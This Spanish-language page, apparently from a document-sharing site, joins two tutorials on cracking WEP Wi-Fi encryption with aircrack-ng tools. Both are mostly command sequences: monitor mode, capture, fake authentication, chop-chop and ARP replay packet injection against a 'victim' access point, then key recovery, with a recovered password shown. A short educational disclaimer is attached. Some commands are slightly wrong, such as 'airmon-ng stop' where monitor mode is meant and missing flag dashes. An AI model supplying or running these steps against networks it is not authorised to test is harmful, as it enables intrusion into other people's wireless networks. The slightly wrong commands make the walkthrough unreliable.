Documentos de Académico
Documentos de Profesional
Documentos de Cultura
En este post les enseare como romper un cifrado WEP primero que todo miraremos como se llama nuestra interfaz de red inalambrica con el siguinte comando #iwconfig
Como podemos ver en la imagen anterior mi dispositvo se llama wlan0 lo siguiente que haremos es poner muestro dispostivo en modo promiscuo (modo monitor) #airmon-ng stop wlan0
Como podemos ver en la imagen anterior tenemos un AP con ESSID JONATHAN y usa el protocolo WEP #airodump-ng c 1 -w prueba -i wlan0
El siguiente paso es asociarnos contra el AP victima con el siguinte comando #aireplay-ng -1 0 -e JONATHAN -a 00:0A:56:9A:18:FB -h 00:E0:4C:04:03:47 wlan0
Ahora creamos una peticin de paquete arp usando el archivo .xor: #packetforge-ng -0 -a 00:0A:56:9A:18:FB -h 00:E0:4C:04:03:47 -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-0914-174512.xor -w arp-request
Ahora enviaremos el paquete ARP creado anteriormente #aireplay-ng -2 -h 00:E0:4C:04:03:47 -r arp-request wlan0
En la siguiente imagen podemos ver en la columna #Data Ya tenenemos los paquetes necesarios para poder lograr descifrar la contrasea
Ahora vamos a descifrar la contrasea con el siguiente comando aircrack-ng -n 64 -z -f 1 -e JONATHAN -b 00:0A:56:9A:18:FB prueba-02*.ivs
Como podemos ver en la imagen anterrior tenemos la contrasea en tipo ASCII y la contrasea es WALDO Este tipo de ataque es muy usado ya que el intruso no tiene que esperar a que un cliente esta autenticado en el AP. Toda la informacin aqu expuesta es para uso educativo y/o cientfico. Todo lo que hagas con estos programas es responsabilidad tuya.
Bueno, esta tutorial me basare para los que ya saben crackear una wep, as que no me molestare en explicar como crackear una wep en este tutorial y los que no tengan ninguna idea aqui en el foro hay de como hacerlo en tal caso, de no entender puedes preguntar o simplemente les puedo hacer un tutorial, pero creo que los que hay en el foro soy muy entendibles. Quedo aclarar que el distro que use no fue nada menos que backtrack 3 Final. Empecemos... 1.- checamos cual es nuestra interfase para poderlo en modo monitor: airmon-ng
2.- como sabemos ponemos nuestra interface en modo monitor: airmon-ng start <interface>
4.- Como vemos nos aparecen algunas as que seleccionamos una, en este caso seleccionare 2WIREXXX. airodump-ng c 6 -w lir -i <interface>
6.- Ahora procedemos hacer el ataque Chop-Chop: aireplay-ng -4 -b 00:14:95:CE:2E:11 -h 00:11:22:33:44:55 <interface>
Le ponemos yes
7.- Usamos tcpdump para poder mirar la ip que nos interesa. tcpdump -s 0 -n -e -r replay_dec-0920-161359.cap
8.- Creamos una peticin de paquete arp usando el archivo .xor: packetforge-ng -0 -a 00:14:95:ce:2e:11 -h 00:11:22:33:44:55 -k 192.168.1.140 -l 192.168.1.254 -y replay_dec-0920-161359.xor -w ddlr.cap
-l ip origen -k ip destino 9.- Finalmente enviamos el recien creado paquete de peticion arp: aireplay-ng -2 -r ddlr.cap <interfase> Le damos yes:
y empezara inyectar super rpido, te sorprenders de la velocidad. 10.- Finalmente sacamos el password: aircrack-ng lir-01.ivs